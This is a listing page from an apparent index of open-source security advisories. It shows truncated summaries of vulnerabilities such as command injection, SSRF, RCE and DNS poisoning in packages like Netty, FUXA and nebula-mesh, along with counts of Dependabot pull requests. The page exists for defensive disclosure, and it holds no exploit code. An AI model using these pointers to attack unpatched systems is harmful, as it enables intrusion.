Data

Tools

Indexes

Applications

Experiments

Dependabot

An open index of dependabot pull requests across open source projects.

Security Advisories

Browse security advisories and track which Dependabot PRs address them.

RSS Feed

32,415

Total Advisories

2,929

With Dependabot PRs

4,315

Critical Severity

11,273

High Severity

Clear All Filters
Unspecified security issues.
CPANSA-MySQL-Admin-1-1
Unspecified security issues.
cpan
No PRs yet
Pheditor: OS Command Injection in terminal handler via unsanitized 'dir' parameter
GHSA-jvc5-6g7q-c843 CVE-2026-48030 CRITICAL about 15 hours ago
### Summary An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by...
packagist
No PRs yet
Dex: Token-exchange endpoint is missing AllowedConnectors enforcement
GHSA-7qjx-gp9h-65qj HIGH about 15 hours ago
## Summary `server/handlers.go::handleTokenExchange` (lines 1804-1893) does not call `isConnectorAllowed(client.AllowedConnectors, connID)` before...
go
No PRs yet
PhoenixStorybook has cross-session PubSub topic injection via URL parameter
GHSA-mrhx-6pw9-q5fh CVE-2026-47068 LOW about 15 hours ago
### Summary The storybook iframe LiveView accepts a PubSub topic from the URL query string and broadcasts its own pid onto that topic with no check...
hex
No PRs yet
PhoenixStorybook: Unbounded atom creation from LiveView event params (atom-table DoS)
GHSA-833p-95jq-929q CVE-2026-8469 HIGH about 15 hours ago
### Summary An attacker who can deliver `psb-assign`, `psb-toggle`, `psb-set-theme`, `upper-tab-navigation`, `lower-tab-navigation`, `playground-ch...
hex
No PRs yet
PhoenixStorybook: Unauthenticated remote code execution via HEEx template injection in phoenix_storybook playground
GHSA-55hg-8qxv-qj4p CVE-2026-8467 CRITICAL about 15 hours ago
### Summary An unsafe HEEx template generation vulnerability allows any unauthenticated user to execute arbitrary code on the server. The phoenix_s...
hex
No PRs yet
SymfonyRuntime CVE-2024-50340 Patch Bypass: Web Requests Can Still Set APP_ENV/APP_DEBUG via parse_str/SAPI Argv Mismatch
GHSA-fqc7-9xjw-jrh3 CVE-2026-47767 MODERATE about 15 hours ago
### Description CVE-2024-50340 (GHSA-x8vp-gf4q-mw5j) addressed an issue where, with `register_argc_argv=On`, a crafted query string let an unauthe...
packagist
No PRs yet
Net::IMAP: Command Injection via ID command argument
GHSA-46q3-7gv7-qmgg CVE-2026-47242 MODERATE about 16 hours ago
### Summary Two `Net::IMAP` commands, `#id` and `#enable`, do not validate their arguments. Arguments to either command could be used by an attac...
rubygems
2
Dependabot PRs
Net::IMAP: Denial of Service via incomplete raw argument validation
GHSA-c4fp-cxrr-mj66 CVE-2026-47241 LOW about 18 hours ago
### Summary Several Net::IMAP commands accept a raw string argument which is only validated to prevent CRLF injection and then sent verbatim. If ...
rubygems
2
Dependabot PRs
Net::IMAP: Command Injection via non-synchronizing literal in "raw" argument
GHSA-8p34-64r3-mwg8 CVE-2026-47240 MODERATE about 18 hours ago
Several Net::IMAP commands accept a "raw data" argument that is sent verbatim after validation to prevent command injection. However, if a server ...
rubygems
2
Dependabot PRs
shell-quote quote() does not escape newlines in object .op values
GHSA-w7jw-789q-3m8p CVE-2026-9277 CRITICAL about 22 hours ago
### Summary `shell-quote`'s `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field ...
npm
No PRs yet
Unbounded integer parsing in the Version module enables CPU and memory exhaustion denial of service
EEF-CVE-2026-49762 GHSA-w2h8-8x3g-278p CVE-2026-49762 MEDIUM about 22 hours ago
## Summary Uncontrolled Resource Consumption vulnerability in the Elixir standard library's Version module allows an attacker who controls a versi...
No PRs yet
Puma PROXY Protocol v1 Accepts Repeated Protocol Headers on Persistent Connections
GHSA-2vqw-3mp8-cgmx CVE-2026-47737 HIGH 1 day ago
### Impact Puma is vulnerable to source IP spoofing when `set_remote_address proxy_protocol: :v1` is enabled and persistent connections are used. ...
rubygems
7
Dependabot PRs
Puma PROXY Protocol v1 Parser Allows Remote Memory Exhaustion
GHSA-qpgp-93vx-g8v8 CVE-2026-47736 HIGH 1 day ago
### Impact [PROXY protocol support for Puma](https://github.com/puma/puma/issues/2651) was added in version 5.5.0. When PROXY protocol v1 support...
rubygems
7
Dependabot PRs
Arc has an authenticated arbitrary local-file read via DuckDB I/O functions that bypasses RBAC table-level checks
GHSA-p2j4-c4g6-rpf5 CVE-2026-47735 HIGH 1 day ago
### Summary Arc's user-SQL validator (`internal/api/query.go:ValidateSQLRequest`) blocked only `read_parquet(` and `arc_partition_agg(` via regex ...
go
No PRs yet
Dulwich has unbounded memory allocation in receive-pack from crafted thin packs
GHSA-xrvj-v92f-53gj CVE-2026-47734 MODERATE 1 day ago
## Impact An uncontrolled-resource-consumption (memory exhaustion) denial-of-service vulnerability (CWE-400 / CWE-789). A client with push access...
pypi
No PRs yet
nebula-mesh: GET /api/v1/audit-log discloses all entries to any operator
GHSA-qm33-p5p9-f8vg CVE-2026-47726 HIGH 1 day ago
`internal/api/audit.go:12` — `handleGetAuditLog` does no admin check. The route is bearer-auth gated only; any operator API key returns the full au...
go
No PRs yet
nebula-mesh's web UI lacks CSRF tokens on /ui/* mutating endpoints
GHSA-273q-qgh5-wrj6 CVE-2026-47725 HIGH 1 day ago
Every `/ui/*` POST / PUT / PATCH / DELETE route processes the request as soon as the session cookie validates. `SameSite=Lax` on the session cookie...
go
No PRs yet
nebula-mesh: API endpoints lack ownership checks, enabling cross-operator privilege escalation
GHSA-598g-h2vc-h5vg CVE-2026-47724 CRITICAL 1 day ago
The `/api/v1/*` route surface trusts the bearer token alone for authorisation on most endpoints. The codebase itself admits this at `internal/api/h...
go
No PRs yet
nebula-mesh: Web UI and API responses lack security headers (CSP, X-Frame-Options, HSTS, etc.)
GHSA-w7w5-5gcp-38rw CVE-2026-47723 HIGH 1 day ago
None of the response paths in `internal/web/` or `internal/api/` set the standard browser-security headers. `grep` for `Content-Security-Policy`, `...
go
No PRs yet
nebula-mesh: Host advanced overrides allow YAML injection into agent config.yml
GHSA-7hp6-g3pq-3pc3 CVE-2026-47722 HIGH 1 day ago
`internal/configgen/generator.go:86,108,119` interpolates the operator-supplied `ListenHost` and `TunDevice` fields raw into a `text/template` that...
go
No PRs yet
FUXA's scheduler API missing admin check enables operator-to-admin escalation via scheduled device actions
GHSA-8ghr-w65f-j3qr CVE-2026-47721 MODERATE 1 day ago
## Summary An authorization issue in the Scheduler API allowed authenticated non-admin users to create or modify scheduled actions that should be ...
npm
No PRs yet
FUXA has SQL Injection in its TDengine DAQ connector via backslash bypass of escapeTdString
GHSA-h9fj-c2qr-76g2 CVE-2026-47720 MODERATE 1 day ago
## Summary The TDengine DAQ storage connector's `escapeTdString` at `server/runtime/storage/tdengine/index.js:10` doubles single quotes but does n...
npm
No PRs yet
FUXA: Unauthenticated SSRF via Socket.IO DEVICE_WEBAPI_REQUEST and DEVICE_PROPERTY with response reading
GHSA-w86f-rf9w-h3x6 CVE-2026-47719 HIGH 1 day ago
## Summary An unauthenticated attacker (Alice) connects to FUXA's Socket.IO endpoint and emits a `device-webapi-request` event whose `property.add...
npm
No PRs yet
Dulwich doesn't sanitize commit subjects in `porcelain.format_patch`
GHSA-555p-6grf-mh7f CVE-2026-47712 LOW 1 day ago
### Impact dulwich.porcelain.format_patch(outdir=...) derives each patch filename from the commit's subject line. Prior to this fix, get_summary o...
pypi
1
Dependabot PRs
Poweradmin: CSV Injection in log export endpoints allows formula execution in spreadsheet applications
GHSA-3h6h-67x3-cv5x CVE-2026-47693 MODERATE 1 day ago
Description: ### Summary Poweradmin v4.4.0 is vulnerable to CSV Injection (Formula Injection) in its log export functionality. User-controlled da...
packagist
No PRs yet
Anyquery: AppleScript/JXA Code Injection via Unescaped URL in macOS Chrome Plugin
GHSA-hrj8-hjv8-mgwc CVE-2026-47252 CRITICAL 1 day ago
# AppleScript/JXA Code Injection via Unescaped URL in macOS Chrome Plugin | Field | Value | | ---------------- | ----- | | Repository ...
go
No PRs yet
Netty has Insufficient Bailiwick Validation for NS Records
GHSA-5pvg-856g-cp85 CVE-2026-47691 HIGH 1 day ago
### Summary Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling...
maven
5
Dependabot PRs
Netty HTTP/2: Advertised MAX_CONCURRENT_STREAMS are not enforced
GHSA-5x3r-wrvg-rp6q CVE-2026-47244 MODERATE 1 day ago
### Impact DefaultHttp2Connection.DefaultEndpoint initialises maxActiveStreams/maxStreams to Integer.MAX_VALUE, and Http2Settings never inserts SET...
maven
5
Dependabot PRs
Netty: SCTP reassembly nests buffers without bound
GHSA-5xrh-qmmq-w6ch CVE-2026-46340 HIGH 1 day ago
For each non-complete SctpMessage fragment the handler does `fragments.put(streamId, Unpooled.wrappedBuffer(frag, byteBuf))`, wrapping the previous...
maven
5
Dependabot PRs
Netty Vulnerable to DNS Cache Poisoning via Missing Bailiwick Checks in CNAME Records
GHSA-676x-f7gg-47vc CVE-2026-45674 HIGH 1 day ago
### Summary Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses. ### Details In `io.netty.resolve...
maven
5
Dependabot PRs
Netty: DNS Cache Poisoning due to Predictable PRNG and Default Static Source Port
GHSA-xmv7-r254-6q78 CVE-2026-45673 MODERATE 1 day ago
### Summary Netty's DNS resolver uses a predictable PRNG for generating DNS transaction IDs and defaults to a static UDP source port. This combinat...
maven
5
Dependabot PRs
Netty: Unix-socket fd receive leaks descriptors when peer sends two at once
GHSA-w573-9ffj-6ff9 CVE-2026-45536 MODERATE 1 day ago
netty_unix_socket_recvFd sets msg_control to `char control[CMSG_SPACE(sizeof(int))]` (line 940) — 24 bytes on 64-bit Linux. A peer-sent SCM_RIGHTS ...
maven
5
Dependabot PRs
Netty: SNI handler pre-allocates up to 16 MiB from nine attacker bytes
GHSA-x4gw-5cx5-pgmh CVE-2026-45416 HIGH 1 day ago
SslClientHelloHandler.decode() reads the 24-bit TLS handshake length and, when the ClientHello does not fit in the first record, eagerly allocates ...
maven
5
Dependabot PRs
PHPSpreadsheet has a patch bypass for CVE-2026-34084
GHSA-87m4-826x-3crx CVE-2026-45034 CRITICAL 1 day ago
## Summary CVE-2026-34084 was patched by the helper `File::prohibitWrappers`. The helper calls `parse_url($filename, PHP_URL_SCHEME)` and then che...
packagist
No PRs yet
Netty's Default QUIC token handler accepts any client-supplied token
GHSA-cmm3-54f8-px4j CVE-2026-44894 HIGH 1 day ago
NoQuicTokenHandler is the tokenHandler used when the application does not set one. Its writeToken() returns false (server will not send Retry — acc...
maven
3
Dependabot PRs
Netty: HAProxy SSL TLV parsing leaks retained slice on invalid TLV length
GHSA-cc37-9q2j-3hfv CVE-2026-44893 HIGH 1 day ago
When decoding a PP2_TYPE_SSL TLV, HAProxyMessage.readNextTLV() first calls `header.retainedSlice(header.readerIndex(), length)` and only then reads...
maven
8
Dependabot PRs
Netty has a Vulnerable Default Configuration Which Leads to Denial of Service via Unbounded HTTP/3 Header Size
GHSA-c2rx-5r8w-8xr2 CVE-2026-44892 HIGH 1 day ago
### Summary The default configuration of the `Http3ConnectionHandler` in the Netty HTTP/3 codec lacks an enforced maximum header size limit. When a...
maven
3
Dependabot PRs
Netty has Unbounded Direct Memory Consumption in its RedisDecoder
GHSA-6ghj-frrj-jjj3 CVE-2026-44890 HIGH 1 day ago
### Summary An attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's dire...
maven
8
Dependabot PRs
Netty: Memory Exhaustion in RedisArrayAggregator due to Deeply Nested Arrays
GHSA-3244-j874-rhc2 CVE-2026-44250 HIGH 1 day ago
### Summary An attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive nu...
maven
8
Dependabot PRs
Netty has an IPv6 Subnet Filter Bypass via Incorrect Comparator Masking
GHSA-3qp7-7mw8-wx86 CVE-2026-44249 HIGH 1 day ago
### Summary An attacker can bypass IPv6 subnet rules due to an incorrect masking operation in IpSubnetFilterRule.compareTo(). Valid public IP addre...
maven
8
Dependabot PRs
actual Allows Electron to Run As Node
GHSA-7rvm-xjpp-63r9 CVE-2026-42890 MODERATE 2 days ago
## Summary A electron run as node vulnerability was identified in `actual` (macOS application, version `25.x (Electron 39.2.7)`). **Vulnerability...
npm
No PRs yet
Authlib OAuth 2.0 has Open Redirect in Authorization API that allows attacker-controlled redirect_uri through unsupported response_type
GHSA-w8p2-r796-3vmq CVE-2026-41479 MODERATE 2 days ago
### Summary Authlib's OAuth 2.0 authorization endpoint can be turned into an unauthenticated open redirect when a request uses an unsupported respo...
pypi
No PRs yet
HTTP Response Splitting via Non-VCHAR Bytes in cow_http_struct_hd:escape_string/2
EEF-CVE-2026-43966 CVE-2026-43966 MEDIUM 2 days ago
## Summary Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in ninenines cowlib allows ...
hex
No PRs yet
Decompression bomb DoS in Req via auto-decoded archive and compressed response bodies
EEF-CVE-2026-49755 GHSA-655f-mp8p-96gv CVE-2026-49755 HIGH 2 days ago
## Summary Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in wojtekmach Req allows attacker-controlled HTTP server...
hex
No PRs yet
Multipart form-data header injection in Req via unescaped name/filename/content_type
EEF-CVE-2026-49756 GHSA-px9f-whj3-246m CVE-2026-49756 LOW 2 days ago
## Summary Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in wojtekmach Req allows multipart parameter smuggling via a...
hex
No PRs yet
gun HTTP/1.1 response buffer has no size limit allowing server-controlled memory exhaustion
EEF-CVE-2026-43973 CVE-2026-43973 HIGH 2 days ago
## Summary Uncontrolled Resource Consumption vulnerability in ninenines gun (gun\_http module) allows a malicious server to exhaust client memory ...
hex
No PRs yet
gun HTTP/2 PUSH_PROMISE authority not validated against connection origin allows cross-origin cookie injection
EEF-CVE-2026-43972 CVE-2026-43972 MEDIUM 2 days ago
## Summary Origin Validation Error vulnerability in ninenines gun (gun\_http2 module) allows cross-origin cookie injection via unvalidated HTTP/2 ...
hex
No PRs yet
gun HTTP/1.1 client accepts unsolicited 101 Switching Protocols response allowing server-driven protocol hijack and OOM
EEF-CVE-2026-43974 CVE-2026-43974 HIGH 2 days ago
## Summary Unexpected Status Code or Return Value vulnerability in ninenines gun (gun\_http module) allows a malicious HTTP server to force the cl...
hex
No PRs yet
GeoNode contains a server-side request forgery vulnerability in the service registration endpoint
GHSA-hw9r-6m78-w6h3 CVE-2026-39922 MODERATE 2 days ago
GeoNode versions 4.4.5 and 5.0.2 (and prior within their respective releases) contain a server-side request forgery vulnerability in the service re...
pypi
No PRs yet